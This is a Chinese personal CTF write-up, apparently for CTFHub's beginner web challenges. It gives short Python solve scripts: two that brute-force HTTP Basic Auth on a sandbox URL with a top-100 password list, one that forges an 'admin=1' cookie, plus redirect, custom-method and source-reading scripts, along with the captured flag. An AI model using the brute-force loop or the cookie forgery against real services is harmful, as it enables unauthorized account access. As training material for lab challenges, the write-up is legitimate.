目录
个人题解记录,不喜勿喷
Web前置技能
一、HTTP协议
1、基础认证
在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供`用户名` 和`密码`的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证
直接上脚本
#!/usr/bin/python
# -*- coding: utf-8 -*-
# -- author : valecalida --
# edit_time: 2020/3/19 下午6:43
from urllib.request import HTTPBasicAuthHandler, build_opener, HTTPPasswordMgrWithDefaultRealm
from urllib.error import URLError
username = 'admin'
f = open('10_million_password_list_top_100.txt', 'r')
url = "http://challenge-b14d74b2bbccc186.sandbox.ctfhub.com:10080/flag.html"
for line in f.readlines():
password = line.strip()
instance = HTTPPasswordMgrWithDefaultRealm()
instance.add_password(None, url, username, password)
auth_handler = HTTPBasicAuthHandler(instance)
opener = build_opener(auth_handler)
try:
res = opener.open(url)
html = res.read().decode('utf-8')
print("用户名:admin 密码:%s" % password, "是正确答案")
print("flag为:", html)
break
except URLError as e :
print("用户名:admin 密码:%s" % password, "不是正确答案,原因是:", e.reason)
f.close()
这里为了直观的看到密码,我这里打印了一下,不然可以不打印
运行结果是
用户名:admin 密码:123456 不是正确答案,原因是: Unauthorized
用户名:admin 密码:password 不是正确答案,原因是: Unauthorized
·
·
·
省
略
很
多
行
·
·
·
用户名:admin 密码:andrew 不是正确答案,原因是: Unauthorized
用户名:admin 密码:tigger 是正确答案
flag为: ctfhub{e33b1ac90d8205e95a7dc326726cd1ffe080c673}
或者使用下面这个脚本也可以
#!/usr/bin/python
# -*- coding: utf-8 -*-
# -- author : valecalida --
# edit_time: 2020/3/20 下午2:27
import requests
from requests.auth import HTTPBasicAuth
username = 'admin'
f = open('10_million_password_list_top_100.txt', 'r')
url = "http://challenge-8d232fa7f09a8d27.sandbox.ctfhub.com:10080/flag.html"
for line in f.readlines():
password = line.strip()
res = requests.get(url=url, auth = HTTPBasicAuth(username, password))
if res.status_code == 200:
print(res.text)
break
# else:
# continue
2、302跳转
#!/usr/bin/python
# -*- coding: utf-8 -*-
# -- author : valecalida --
import requests
url = "http://challenge-061acc63c590e9b4.sandbox.ctfhub.com:10080/index.php"
r = requests.get(url,allow_redirects=False)
print(r.text)
3、Cookie
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
import urllib.request
url = "http://challenge-dd1412b01a02d5dd.sandbox.ctfhub.com:10080/"
header = {
"Cookie": "admin=1"
}
req = urllib.request.Request(url, headers=header, method="GET")
res = urllib.request.urlopen(req)
print(res.read().decode('utf-8'))
4、请求方式
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
# Edit time: 2020/3/19 19:59
from urllib import request
import re
"""
HTTP Method is GET
Use CTF**B Method, I will give you flag.
Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php.
"""
rr = re.compile(r'\bctfhub{.*}', re.I)
url = "http://challenge-c2631c2870dc91e1.sandbox.ctfhub.com:10080/index.php"
req = request.Request(url=url, method="CTFHUB")
res = request.urlopen(req)
print(rr.findall(res.read().decode('utf-8'))[0])
5、响应包源代码
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
# Edit time: 2020/3/19 20:56
import re
import urllib.request
rr = re.compile(r'\bctfhub{.*}', re.I)
url = "http://challenge-226bf952c446eb7c.sandbox.ctfhub.com:10080/"
res = urllib.request.urlopen(url)
print(rr.findall(res.read().decode('utf-8'))[0])
未完待续~~